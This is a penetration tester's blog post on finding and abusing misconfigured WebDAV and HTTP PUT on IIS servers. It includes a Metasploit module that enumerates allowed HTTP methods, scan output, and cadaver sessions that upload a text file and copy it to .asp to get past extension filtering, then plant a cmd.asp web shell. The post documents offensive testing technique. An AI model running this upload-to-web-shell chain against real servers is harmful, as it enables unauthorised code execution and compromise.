From LOW to PWNED [7] HTTP PUT/WebDAV/SEARCH

Post [7] HTTP PUT/WebDAV/SEARCH

Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server.  Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
     *Dirbusting and ruby FTW*

I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory.  VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.

Once you have a directory you want to test you can use cadaver to manually test, davtest, or Ryan Linn's metasploit module for testing for WebDAV.

I've also done some posts on webDAV in the past

http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html
http://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.html

hdm had done a post on it in the past in relation to the asp payload, i cant find it on the R7 site but its mirrored here: http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html

Decent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdf

HTTP PUT

HTTP PUT/SEARCH usually gets rolled into

Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you.  I don't think any vuln scanners do, i'm sure someone will correct me if i'm wrong.

Writable HTTP PUT is rare (least for me) although some friends say they see it all the time.

metasploit has a module to test for PUT functionality as well.  

http://www.metasploit.com/modules/auxiliary/scanner/http/http_put

HTTP SEARCH

HTTP SEARCH can be fun. When enabled, will give you a listing of every file in the webroot.

Mubix did a post on it http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html

Metasploit HTTP Options Aux Module

I basically bastardized hdm's version aux module to create an options module. I wanted something that would look for web servers that allowed the PUT Method.

the code:

##
# options.rb
# bastardized from version module
##
# This file is part of the Metasploit Framework and may be
# subject to redistribution and commercial restrictions.
# Please see the Metasploit Framework web site for more
# information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Scanner::Http::Options < Msf::Auxiliary
# Exploit mixins should be called first
include Exploit::Remote::HttpClient

# Scanner mixin should be near last
include Auxiliary::Scanner

def initialize
super(
'Name' => 'HTTP Options Detection',
'Version' => '$Revision: 4886 $',
'Description' => 'Display available http options about each system',
'Author' => 'CG',
' License' => MSF_LICENSE
)

end

# Fingerprint a single host
def run_host(ip)

self.target_port = datastore['RPORT']

begin
res = send_request_raw({
'version' => '1.0',
'uri' => '*',
'method' => 'OPTIONS'
}, 10)

if (res and res.headers['Allow'])
print_status("#{ip} allows #{res.headers['Allow']} methods")
end



rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end


end
end

the module in action:

msf auxiliary(options) > run
[*] a.b.c.30 allows OPTIONS, GET, HEAD, POST methods
[*] a.b.c.67 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.104 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.130 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.135 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.141 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.142 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.147 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.149 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] a.b.c.211 allows OPTIONS, TRACE, GET, HEAD, POST methods
[*] a.b.c.212 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] a.b.c.246 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

of course, allowing PUT doesn't necessarily all "you" to PUT anything. Most of the time you'll find that it doesnt. That's because the web server on IIS5+ doesn't allow write or modify by default.

cg@segfault:~$ cadaver
dav:!> open http://a.b.c.246
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 3981 bytes failed:
403 Forbidden
dav:/> exit

Creating a HTTP OPTIONS auxiliary module for Metasploit

Inspired by HD's HTTP version auxiliary module i wanted to see if i could get one going that would be pull down the HTTP Verbs allowable on a web server.

Basically i wanted to do:

cg@segfault:~/evil/msf3$ nc 192.168.0.109 80
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Aug 2007 05:18:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL:
DAV: 1,2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

cg@segfault:~/evil/msf3$

but with a metasploit auxiliary module. so i got it going... mostly HD's module but i changed what needed to be changed to get it to work.

cg@segfault:~/evil/msf3$ ./msfconsole

____________
<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ msf v3.1-dev
+ -- --=[ 215 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS 192.168.0.109
RHOSTS => 192.168.0.109
msf auxiliary(options) > run
[*] 192.168.0.109 allows OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH methods
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS www.carnal0wnage.com
RHOSTS => www.carnal0wnage.com
msf auxiliary(options) > run
[*] 69.64.54.104 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Auxiliary module execution completed
msf auxiliary(options) >

i'll post the code on carnal0wnage when i get off my butt and a little something something that gives you a status if you are scanning a Class C.

**more on getting code on the box once you find a PUT

cg@segfault:~$ curl -T test.txt http://192.168.0.109/test.txt http://192.168.0.109

then you have to do a MOVE or COPY request. personally i was having issues getting a MOVE request to work with a netcat connection, so i used...

**UPDATE
it ended up being the carriage returns (or lack thereof) that was causing me to get a 400 Bad Request error. I couldnt get the MOVE command to work, but the COPY command did.

cadaver http://www.webdav.org/cadaver/

cg@segfault:~$ cadaver
dav:!> open http://192.168.0.109
dav:/> put upload.asp
Uploading upload.asp to `/upload.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
dav:/> put upload.txt
Uploading upload.txt to `/upload.txt':
Progress: [=============================>] 100.0% of 492 bytes succeeded.
dav:/> copy upload.txt upload.asp
Copying `/upload.txt' to `/upload.asp': succeeded.
dav:/> put upload.inc
Uploading upload.inc to `/upload.inc':
Progress: [=============================>] 100.0% of 5062 bytes succeeded.
dav:/> exit

from there you will want to upload your cmd.asp so you can execute commands on the box.


Browsing to upload.asp and uploading our cmd.asp (cmdx.aspx)



Interacting with out cmdx.aspx to list the directory contents of the C drive


-CG